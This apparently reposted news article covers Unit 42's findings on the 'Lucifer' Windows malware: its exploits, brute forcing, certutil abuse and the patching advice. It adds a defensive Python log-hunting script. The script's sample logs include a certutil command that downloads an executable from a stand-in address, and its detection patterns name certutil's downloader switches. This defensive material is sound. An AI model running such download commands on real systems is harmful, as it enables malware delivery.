'Lucifer' malware targets Windows machines using NSA exploits: Protect yourself now
Security researchers have found a new malware strain that hijacks vulnerable Windows devices to mine cryptocurrency and stage devastating DDoS attacks, prompting the researchers to urge PC users and server administrators to make sure their systems are patched and protected by up-to-date antivirus software.
The malware, named "Lucifer" by its discoverers at Palo Alto Networks' Unit 42 threat-research team, brute-forces its way into Windows machines by trying common usernames and passwords against widely used services (Unit 42 reports it scanning for open TCP ports 135, used by RPC, and 1433, used by Microsoft SQL Server).
The malware primarily targets enterprise servers, since those servers can provide entry into corporate networks, but it can also infect personal computers.
Unit 42 came across the malware while investigating exploitation of CVE-2019-9081, a deserialization vulnerability in the open-source Laravel web application framework for PHP that lets an attacker achieve remote code execution.
"A closer look revealed the malware, which we've dubbed "Lucifer", is capable of conducting DDoS attacks and [is] well-equipped with all kinds of exploits against vulnerable Windows hosts," wrote the Unit 42 researchers in a blog post.
(Lucifer's own creators call the malware "Satan DDoS," but Unit 42 thought that might cause confusion, as there's already a "Satan" ransomware family.)
"The first wave of the campaign stopped on June 10, 2020. The attacker then resumed their campaign on June 11, 2020, spreading an upgraded version of the malware and wreaking havoc."
Powerful malware threat
The researchers described Lucifer as "quite powerful in its capabilities." Once it has infected a system, it drops the XMRig miner to mine the Monero cryptocurrency for the attackers and spreads to other machines on the local network using the EternalBlue and EternalRomance SMBv1 exploits together with the DoublePulsar backdoor, tools that were leaked from the U.S. National Security Agency (NSA) in 2017.
According to the researchers, the attackers are "weaponising" a range of security vulnerabilities with the Lucifer malware.
Identified by Common Vulnerabilities and Exposures (CVE) ID numbers, these are:
- CVE-2014-6287 (Rejetto HTTP File Server remote code execution)
- CVE-2018-1000861 (Jenkins Stapler web framework remote code execution)
- CVE-2017-10271 (Oracle WebLogic Server WLS Security component remote code execution)
- CVE-2018-20062 (ThinkPHP remote code execution)
- CVE-2018-7600 (Drupal "Drupalgeddon2" remote code execution)
- CVE-2017-9791 (Apache Struts 2 Showcase plugin remote code execution)
- CVE-2019-9081 (Laravel Framework deserialization remote code execution)
- PHPStudy backdoor remote code execution (no CVE assigned)
- CVE-2017-0144 and CVE-2017-0145 (Windows SMBv1 flaws exploited by EternalBlue and EternalRomance, fixed by MS17-010)
- CVE-2017-8464 (Windows LNK shortcut-file remote code execution)
"These vulnerabilities have either high or critical ratings due to their trivial-to-exploit nature and their tremendous impact inflicted on the victim," explained the researchers.
"Once exploited, the attacker can execute arbitrary commands on the vulnerable device. In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging the certutil utility in the payload for malware propagation."
Certutil.exe is a legitimate Microsoft command-line tool for managing certificates and Active Directory Certificate Services. Attackers abuse it as a "living off the land" binary: its -urlcache -f option fetches a file from a URL, and its -decode option turns a base64 text blob back into a binary, so a payload can be downloaded and unpacked on a freshly compromised host without dropping a separate downloader that antivirus might flag.
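The two behaviours described above, credential brute forcing and certutil-based payload download, both leave traces in ordinary Windows event logs, and a defender can hunt for them without any Lucifer-specific signature. The following Python is an added example written for this article, not Unit 42's code; the log lines are constructed for the demo and loosely modelled on Windows Security events 4625 (failed logon) and 4688 (process creation, with command-line auditing enabled), so the field names and thresholds are assumptions to adapt to a real SIEM feed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs). One line per event:
#   <ISO timestamp> <event id> key=value ...   (values may be double-quoted)
SAMPLE_EVENTS = """\
2020-06-11T10:00:01 4625 src=203.0.113.7 user=administrator
2020-06-11T10:00:02 4625 src=203.0.113.7 user=admin
2020-06-11T10:00:02 4625 src=203.0.113.7 user=sa
2020-06-11T10:00:03 4625 src=203.0.113.7 user=root
2020-06-11T10:00:03 4625 src=203.0.113.7 user=administrator
2020-06-11T10:00:04 4625 src=203.0.113.7 user=test
2020-06-11T10:07:30 4625 src=192.0.2.44 user=jsmith
2020-06-11T10:08:10 4624 src=192.0.2.44 user=jsmith
2020-06-11T10:09:05 4688 host=WS01 image=C:\\Windows\\System32\\certutil.exe cmdline="certutil -urlcache -f http://198.51.100.9/svchost.exe C:\\Users\\Public\\svchost.exe"
2020-06-11T10:09:06 4688 host=WS01 image=C:\\Windows\\System32\\certutil.exe cmdline="certutil -decode C:\\Users\\Public\\p.b64 C:\\Users\\Public\\p.exe"
2020-06-11T10:15:00 4688 host=WS02 image=C:\\Windows\\System32\\certutil.exe cmdline="certutil -store my"
"""

LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<eid>\d+) (?P<rest>.*)$')
KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')

# certutil switches that fetch or unpack a payload; -urlcache/-verifyctl only
# matter when a URL is on the command line, -decode/-encode always do.
CERTUTIL_ABUSE_RE = re.compile(r'-(urlcache|verifyctl|decode|encode)\b', re.I)
URL_RE = re.compile(r'https?://', re.I)


def parse_events(text):
    """Turn the key=value log format above into a list of dicts."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash the hunt
        ev = {"ts": datetime.fromisoformat(m["ts"]), "eid": int(m["eid"])}
        for key, raw, quoted in KV_RE.findall(m["rest"]):
            ev[key] = quoted if raw.startswith('"') else raw
        events.append(ev)
    return events


def brute_force_sources(events, threshold=5, window=timedelta(minutes=2)):
    """Sliding-window count of failed logons (4625) per source address.

    Returns {src: peak_failures_in_window} for every source whose peak reaches
    the threshold. A single mistyped password (192.0.2.44 below) stays quiet;
    a password spray from one address (203.0.113.7) is flagged.
    """
    per_src = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["eid"] == 4625 and "src" in ev:
            per_src[ev["src"]].append(ev["ts"])
    flagged = {}
    for src, times in per_src.items():
        recent, peak = deque(), 0
        for t in times:
            recent.append(t)
            while t - recent[0] > window:
                recent.popleft()
            peak = max(peak, len(recent))
        if peak >= threshold:
            flagged[src] = peak
    return flagged


def certutil_abuse(events):
    """Process-creation events (4688) where certutil.exe is used as a downloader
    or decoder. Returns a list of (host, switch, command line) tuples; the
    benign 'certutil -store my' is not reported."""
    hits = []
    for ev in events:
        if ev["eid"] != 4688:
            continue
        if not ev.get("image", "").lower().endswith("certutil.exe"):
            continue
        cmd = ev.get("cmdline", "")
        m = CERTUTIL_ABUSE_RE.search(cmd)
        if not m:
            continue
        switch = m.group(1).lower()
        if switch in ("urlcache", "verifyctl") and not URL_RE.search(cmd):
            continue  # cache maintenance without a URL is ordinary admin use
        hits.append((ev.get("host", "?"), switch, cmd))
    return hits


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print("brute-force sources:", brute_force_sources(evs))
    for host, switch, cmd in certutil_abuse(evs):
        print(f"certutil abuse on {host} via -{switch}: {cmd}")
```

On a real estate the same two functions would be fed from Security event 4625 and from 4688 or Sysmon event 1; note that 4688 only carries the command line when the "Include command line in process creation events" policy is turned on, without which the certutil check has nothing to match.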
How to avoid the Lucifer malware
Although these vulnerabilities are certainly worrying, the researchers noted that patches for all of them are "readily available" and urged organisations to keep their systems updated to mitigate attacks.
The researchers added: "While the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it's utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance."
To make sure your Windows system, whether it's a laptop or a web server, isn't hit by Lucifer, make sure it is fully patched with the latest Windows security updates (the EternalBlue and EternalRomance flaws have been fixed since the MS17-010 update of March 2017), disable SMBv1 if nothing still depends on it, keep RPC and SQL Server ports off the internet, and give the administrator account a strong, unique password so that the brute-force stage has nothing to guess.
Of course, it also helps to be running reputable antivirus software, most of which will recognise and block Lucifer and its components, such as the bundled XMRig miner and the SMB exploit code, right away.
Source: https://www.tomsguide.com/news/lucifer-malware-windows
Posted by: mossgivered.blogspot.com